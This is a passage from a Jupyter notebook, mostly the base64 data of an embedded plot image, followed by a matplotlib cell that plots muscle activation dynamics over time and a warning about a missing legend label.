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\n",
"text/plain": [
"<matplotlib.figure.Figure at 0x7fc7a72a3cf8>"
]
},
"metadata": {},
"output_type": "display_data"
}
],
"source": [
"fig, ax = plt.subplots(1, 1, figsize=(6,6), sharex=True)\n",
"\n",
"ax.plot(t,a_dynamics,c='magenta')\n",
"plt.grid()\n",
"plt.xlabel('time (s)')\n",
"plt.ylabel('Activation dynamics')\n",
"\n",
"\n",
"ax.legend()"
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {
"scrolled": false
},
"outputs": [
{
"name": "stderr",
"output_type": "stream",
"text": [
"/opt/miniconda3/lib/python3.6/site-packages/matplotlib/axes/_axes.py:545: UserWarning: No labelled objects found. Use label='...' kwarg on individual plots.\n",
